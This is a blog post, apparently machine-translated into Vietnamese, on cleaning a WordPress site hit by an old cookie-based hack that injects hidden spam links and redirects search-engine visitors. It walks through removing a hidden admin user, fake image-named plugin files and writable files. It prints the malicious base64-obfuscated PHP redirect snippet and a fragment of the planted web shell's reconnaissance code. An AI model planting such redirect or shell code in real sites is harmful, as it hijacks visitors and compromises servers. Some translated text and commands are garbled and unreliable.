Trong tháng vừa qua, tôi đã nhận được cảnh báo virus trong blog từ một số du khách. Ban đầu tôi bỏ qua những lời cảnh báo, bởi vì tôi đã cài đặt một antivirus khá tốt (Kaspersky AV 2009) Và mặc dù blog dài nhà nước, tôi không bao giờ nhận được một cảnh báo virus (trước đó .. Tôi thấy một cái gì đó đáng ngờ rằng refresh đầu tiên biến mất. Dù sao ...).
Dần dần bắt đầu xuất hiện sự thay đổi lớn lưu lượng truy cậpSau đó giao thông thời gian gần đây đã giảm dần và bắt đầu được nhiều hơn và nhiều người nói với tôi rằng stealthcài đặt.com nó là virused. Hôm qua tôi nhận được từ một người nào đó một ảnh chụp màn hình được thực hiện khi diệt virus chặn một kịch bản từ stealthcài đặt.com:Trojan-Clicker.HTML.IFrame.gr. Nó đã được khá thuyết phục cho tôi, mà tôi đưa vào tìm kiếm tất cả các nguồn. Ý tưởng đầu tiên đến với tâm trí của tôi là làm cho nâng cấp phiên bản mới nhất của WordPress (2.5.1), nhưng không phải trước khi xóa tất cả các tệp trong tập lệnh cũ WordPress và để làm cơ sở dữ liệu sao lưu. Quy trình này không hoạt động và có lẽ tôi đã mất nhiều thời gian để tìm ra lỗi ở đâu, nếu nó không cho tôi biết. Eugen một cuộc nói chuyện cà phê, ông đã tìm thấy liên kết Google và nó sẽ là tốt để xem anh ta.
MyDigitalLife.info, đã xuất bản một bài báo có tựa đề: “WordPress Hack: Khôi phục và sửa chữa Google và Công cụ tìm kiếm hoặc Không có lưu lượng truy cập cookie được chuyển hướng đến Your-Needs.info, AnyResults.Net, Golden-Info.net và các trang web bất hợp pháp khác"Đó là kết thúc của các chủ đề tôi cần.
Đó là về một khai thác de WordPress dựa trên cookie, Mà tôi nghĩ là rất phức tạp và thực hiện cuốn sách. Đủ thông minh để làm cho một SQL Injection blog của cơ sở dữ liệu, để tạo ra một người dùng vô hình kiểm tra thói quen đơn giản Bảng Điều Khiển (Dashboard)->Người dùng, kiểm tra các thư mục máy chủ và các tập tin "ghi" (cái đó chmod 777), để tìm kiếm và để thi hành các tập tin với những đặc quyền của người sử dụng gốc hoặc nhóm. Tôi không biết những người khai thác tên tuổi và thấy rằng có rất ít bài viết về anh, bất chấp thực tế là nhiều blog đang bị nhiễm bệnh, trong đó có Romania. Ok ... tôi sẽ cố gắng cố gắng giải thích chung chung về virus.
Virus là gì?
Đầu tiên, chèn các nguồn của các trang trên blog, liên kết vô hình đối với du khách mà có thể nhìn thấy và indexable cho công cụ tìm kiếm, đặc biệt là Google. Bằng cách này các trang web chuyển Page Rank chỉ ra bởi kẻ tấn công. Thứ hai, một cái khác được chèn đang chuyển hướng URL cho khách truy cập đến từ Google, Live, Yahoo, ... hoặc từ trình đọc RSS và không có trang web trong Cookie. Một antivirus phát hiện các chuyển hướng như Trojan Clicker.HTML.
Triệu chứng:
Suy giảm lớn trong lưu lượng truy cập, Đặc biệt là trên các blog nơi mà hầu hết du khách đến từ Google.
Xác định: (đây là lúc vấn đề trở nên phức tạp đối với những người không biết nhiều về phpmyadmin, php và linux)
LA. Chú ý! Đầu tiên tạo một cơ sở dữ liệu sao lưu!
1. Kiểm tra các tập tin nguồn index.php, header.php, footer.php, Các chủ đề blog và xem nếu có một mã có sử dụng mã hóa base64 hoặc chứa “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”ở dạng:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>
... Hoặc một cái gì đó. Xóa mã này!
Click vào hình ...
Trong ảnh chụp màn hình ở trên, tôi đã vô tình chọn và " ". Mã đó phải vẫn còn.
2. Sử dụng phpMyAdmin và đi trong bảng cơ sở dữ liệu wp_usersNơi để kiểm tra nếu không có tên người dùng tạo ra trên 00:00:00 0000-00-00 (Có thể có trong lĩnh vực user_login viết "WordPress”. Ghi lại ID của người dùng này (trường ID) và sau đó xóa nó.
Click vào hình ...
* Các đường màu xanh phải được loại bỏ và giữ lại ID của mình. Trong trường hợp buồn ngủLà ID = 8 .
3. Đi đến Bảng wp_usermeta, Ở đâu nằm và loại bỏ dòng ID tương ứng (trong đó lĩnh vực này user_id xuất hiện ID gỡ bỏ).
4. Bảng wp_option, Tới active_plugins và thấy rằng các plugin được kích hoạt nghi ngờ. Nó có thể được sử dụng như kết thúc _old.giff, _old.pngg, _old.jpeg, _new.php.giff, v.v. kết hợp các tiện ích mở rộng hình ảnh phong phú với _old và _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'
Xóa plugin này, sau đó chuyển đến blog -> Trang tổng quan -> Plugin, nơi bạn hủy kích hoạt và kích hoạt bất kỳ plugin nào.
Click vào hình ảnh để xem cách các tập tin xuất hiện active_plugins virus.
Thực hiện theo các đường dẫn trên FTP hoặc SSH, chỉ active_plugins và xóa các tập tin từ máy chủ.
5. Cũng trong phpMyAdmin, trong bảng wp_option, Tìm và xóa các dòng có chứa "rss_f541b3abd05e7962fcab37737f40fad8"Và trong số"internal_links_cache ".
Trong internal_links_cache có sẵn liên kết được mã hóa thư rác xuất hiện trong blog và một Mã của Google Adsgáy, Các hacker.
6. Đề xuất là thay đổi mật khẩu đăng nhập vào blog và loại bỏ tất cả userele đáng ngờ. Nâng cấp lên phiên bản mới nhất của WordPress và đặt blog để không cho phép người dùng mới đăng ký nữa. Không có mất mát… cũng có thể bình luận không có người dùng.
Tôi đã cố gắng ở trên để giải thích một chút, phải làm gì trong tình huống như vậy, để làm sạch blog của virus này. Vấn đề nghiêm trọng hơn nhiều so với mức tưởng tượng và gần như không được giải quyết, bởi vì chúng được sử dụng lỗ hổng bảo mật các máy chủ web hosting, đó là blog.
Như một biện pháp đầu tiên của bảo mật, với truy cập SSH, Làm cho một số kiểm tra trên máy chủ để xem nếu có các tập tin như * _old * và * _new *. Với kết thúc.giff, jpeg, .pngg, .jpgg. Những tập tin cần xóa. Nếu bạn đổi tên một tập tin, ví dụ. top_right_old.giff in top_right_old.phpChúng tôi nhận thấy rằng tập tin chính là khai thác máy chủ mã.
Một số hướng dẫn hữu ích để kiểm tra, làm sạch và bảo mật máy chủ. (thông qua SSH)
1. cd / tmp và kiểm tra xem có thư mục như tmpVFlma hoặc kết hợp khác tên giống nhau và xóa nó. Xem hình bên dưới hai thư mục như vậy với tôi:
rm-rf tên thư mục
2. Kiểm tra và loại bỏ (thay đổi chmod-ul) càng tốt các thư mục có thuộc tính chmod 777
tìm tất cả các tệp có thể ghi trong thư mục hiện tại: Tìm. type f -perm -2 -ls
tìm thấy tất cả các thư mục có thể ghi trong thư mục hiện hành: Tìm. kiểu d -perm -2 -ls
tìm tất cả các thư mục và tệp có thể ghi trong thư mục hiện tại: Tìm. -Perm-2-ls
3. Tìm kiếm các tập tin đáng ngờ trên máy chủ.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"
4, Cảnh báo !!! các tập tin đã được thiết lập bit SUID si SGID. Những tập tin thực thi với những đặc quyền của người sử dụng (nhóm) hoặc gốc, không phải là người dùng thực hiện các tập tin. Những tập tin này có thể dẫn đến sự thỏa hiệp gốc nếu có những vấn đề an ninh. Nếu bạn không sử dụng SUID và SGID bit các tập tin, chạy "chmod 0 " hoặc gỡ bỏ cài đặt các gói có chứa chúng.
Khai thác có một nơi nào đó trong nguồn ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}
Bằng cách này tìm ... về cơ bản vi phạm an ninh. Cổng mở thư mục "ghi" và thực hiện các tập tin nhóm đặc quyền / root.
Trở lại với nhiều ...
Bị nhiễm một số blog: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
xe máy.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Danh sách đi ... rất nhiều.
Bạn có thể kiểm tra xem blog có bị nhiễm hay không bằng cách sử dụng công cụ tìm kiếm của Google. sao chép dán:
trang web mua www.blegoo.com
Chúc ngủ ngon và làm việc tốt;) Tôi nghĩ Eugen sẽ sớm có tin tức, trên foreseised.unposystemable.com.
BRB :)
CHÚ Ý! Thay đổi chủ đề của WordPress hoặc nâng cấp lên WordPress 2.5.1, KHÔNG phải là một giải pháp để loại bỏ virus này.